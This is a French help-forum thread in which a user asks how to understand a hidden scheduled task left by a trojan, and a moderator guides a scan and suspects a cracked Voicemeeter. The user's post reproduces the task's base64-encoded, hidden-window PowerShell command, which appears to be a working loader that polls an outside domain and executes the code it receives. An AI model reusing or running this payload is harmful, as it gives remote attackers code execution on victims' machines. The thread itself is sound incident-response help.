Sujet Précédent Sujet Suivant

Cheval de troie

Fermé
KingkoPop - 4 juin 2022 à 18:04
bazfile Messages postés 54568 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 1 juin 2024 - 7 juin 2022 à 17:55
Bonjours, J'ai eu un cheval de troie qui a infecté ma machine et j'ai vue qu'ils m'ont rajouté des tache dans le planificateur nottement celui la que j'ai du mal a comprendre:
Dans l'invite de commande il fait cette commande:

/c powershell -WindowStyle Hidden -E "JAB2ACAAPQAgACIAMAAiADsACgAkAGwAdgAgAD0AIAAiADMAIgA7AAoAJABkACAAPQAgACIAdABvAG8AYgBsAHkAYwBhAHIAcwAuAGMAbwBtACIAOwAKACQAZQBwACAAPQAgACIAVwB5AEkAegBNAEQASQB3AE0AVABZAHoATQB6AGcANABOAEQAZwAzAE0AegBZAHgATgBpAEkAcwBNAFQAWQAwAE4AagBRADUATgBUAGcAMQBPAEYAMAA9ACIAOwAKAAoAJAByAHAAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABMAG8AZwBpAFMAaABkAHIAXAAiADsACgAkAHIAbgAgAD0AIAAiAFMAZQB0AHQAaQBuAGcAcwAiADsACgAKACQAYQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAHQAcgB5ACAAewAKAAkAJABqAHAAPQAkAGEALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAcAApACkAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0ASgBzAG8AbgA7AAoAfQAgAGMAYQB0AGMAaAB7AH0ACgAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAGYAdQBuAGMAdABpAG8AbgAgAGQAKABbAHMAdAByAGkAbgBnAF0AJABkAGUAKQAgAHsACgAJACQAZABiAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABlACkAOwAKAAoACQAkAHMAdAA9ACQAYQAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABkAGIAWwAwAC4ALgA0AF0AOwAKAAoACQAkAGkAPQAwADsACgAJACQAbAA9ACQAZQBkAC4ATABlAG4AZwB0AGgAOwAKAAkAJABrAD0AQAAoACkAOwAKAAoACQBbAGEAcgByAGEAeQBdADoAOgBSAGUAcwBpAHoAZQAoAFsAcgBlAGYAXQAkAGsALAAkAHMAdAAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAcwB0ACkAIAB7ACQAawBbACQAaQArACsAXQA9ACQAYgAgAC0AYgB4AG8AcgAgACQAZQBkAFsAJABpACUAJABsAF0AfQAKAAoACQAkAGIAcwA9ACQAZABiAFsANQAuAC4AJABkAGIALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAYQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAHQAcgB5ACAAewAKAAkACQB0AHIAeQAgAHsACgAJAAkACQBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcgBwACkAKQAgAHsACgAJAAkACQAJAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcgBwACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAHIAcAAgAC0ATgBhAG0AZQAgACQAcgBuADsACgAJAAkACQAJACQAagBkACAAPQAgAGQAKAAkAHIAKQA7AAoACgAJAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0AIABlAGwAcwBlACAAewAKAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAGQAdAAgAD0AIAB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAC8AeAA/AHUAPQAkAHUAJgBpAHMAPQAkAGkAcwAmAGwAdgA9ACQAbAB2ACYAcgB2AD0AJAB2ACIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAKAAkACQAJACQAagBkADIAIAA9ACAAZAAoACQAZAB0ACkAOwAKAAkACQAJAGkAZgAgACgAJABqAGQAMgBbADAAXQAgAC0AZwB0ACAAJAB2ACkAIAB7AAoACQAJAAkACQAkAHYAMgAgAD0AIAAkAGoAZAAyAFsAMABdADsACgAKAAkACQAJAAkATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcgBwACAALQBOAGEAbQBlACAAJAByAG4AIAAtAFYAYQBsAHUAZQAgACQAZAB0ACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIAUwB0AHIAaQBuAGcAIgAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkACQAkAGoAZAAgAD0AIAAkAGoAZAAyADsACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQBpAGYAIAAoACQAZQB4ACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQBzAHQAbwBwADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAHQAcgB5ACAAewAKAAkACQAJAAkAaQBlAHgAIAAkAGoAZABbADEAXQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAHMAbABzACAAPQAgACgAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANwAwACAALQBtAGkAbgBpAG0AdQBtACAANQAwACkAKgA2ADAAKQA7AAoACQAJAAkAJAB0AHMAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAAkAcgB1AG4AKAAkAGQALAAkAHUALAAkAGkAcwApADsACgAJAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAoAGcAZQB0AC0AcgBhAG4AZABvAG0AIAA2ADUAIAAtAG0AaQBuAGkAbQB1AG0AIAAyADUAKQA7AAoACQAJAAkACQAkAHQAcwAyACAAPQAgAFsAaQBuAHQAXQAoAEcAZQB0AC0ARABhAHQAZQAgAC0AVQBGAG8AcgBtAGEAdAAgACUAcwApADsACgAKAAkACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQAJAGIAcgBlAGEAawAgAHMAbAA7AAoACQAJAAkACQB9AAoACQAJAAkAfQAKAAkACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="

Ayant vue cette monstruosité je me demande comment retrouvé la chose qui est Hidden pour pouvoir comprendre ce qu'il fait avec ce fichier.

Ma question est: Comment on peut retrouvé cette chose ?

Merci d'avance !

2 réponses

Réponse 1 / 2
bazfile Messages postés 54568 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 1 juin 2024 18 721
5 juin 2022 à 11:40
Bonjour,
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :

Clique sur Analyser

Attention, attendre que les messages disant que l'analyse est terminée s'affichent



À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition


Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
0
Réponse 2 / 2
KingkoPop
Modifié le 7 juin 2022 à 17:44
Bonjour,
Merci de ta réponse voici les 2 fichiers txt:
Addition.txt : https://www.cjoint.com/c/LFhohXiTonV
FrST.txt : https://www.cjoint.com/c/LFhoifOXM5V
Merci d'avance <3
0
bazfile Messages postés 54568 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 1 juin 2024 18 721
7 juin 2022 à 17:55
Bonjour.
Il y a effectivement un reste de cheval de Troie, il y a bien une tâche planifiée qui est due à voicemeeter as-tu acheté Voicemeeter ou est-ce une version "non officielle" ?
J'attends ta réponse afin de faire un script de désinfection.
0

Discussions similaires

L'antivirus ESET NOD32 bloque UPTOBOX ( HTML/ScrInject.B ).
Logan -
Snoopyx -

10 réponses
Présence ou non de cheval de troie ?
hunter55 -
Malekal_morte- -

14 réponses
windows defender cheval de troie
dplonguet -
Faarid.31 -

3 réponses
Cheval de Troie et ordi bloqué!!!
Bouillouck -
Speed-Air -

3 réponses
expressions francaises
bifaka -
lanonyme -

4 réponses